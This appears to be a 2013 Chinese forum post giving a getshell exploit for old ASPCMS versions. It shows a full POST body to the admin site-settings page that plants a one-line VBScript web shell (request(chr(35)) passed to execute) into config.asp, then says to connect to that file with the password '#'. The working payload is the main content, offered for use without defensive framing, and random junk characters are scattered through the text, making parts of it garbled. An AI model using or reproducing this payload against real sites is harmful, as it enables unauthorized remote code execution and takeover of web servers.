老的ASPCMS版本的秒杀拿SHELL漏洞
( x, Y- ]# i M( P
/ a1 ^6 X. |! Q7 u2 y# l 找到后台。。。然后
1 [ ]. e0 H* e6 E# E
+ ^1 I6 H/ T. h/admin/_system/AspCms_SiteSetting.asp?action=saves1 Q* |; }3 O, F. G; R4 q8 B
! G5 @9 X( A( W/ Y5 o, [7 \
直接POST+ `2 s5 U- K- X" I: H7 z( A
" ^) R+ G0 q# w! D5 Q+ @runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
0 Z ]) A, W4 T7 k0 a
! O, W6 I) r" Z再连接配置文件config.asp 密码为#; m4 o1 m: @" C2 A* Y, t+ ^2 U
|
发表于 2013-2-4 16:18:35
收藏
支持
反对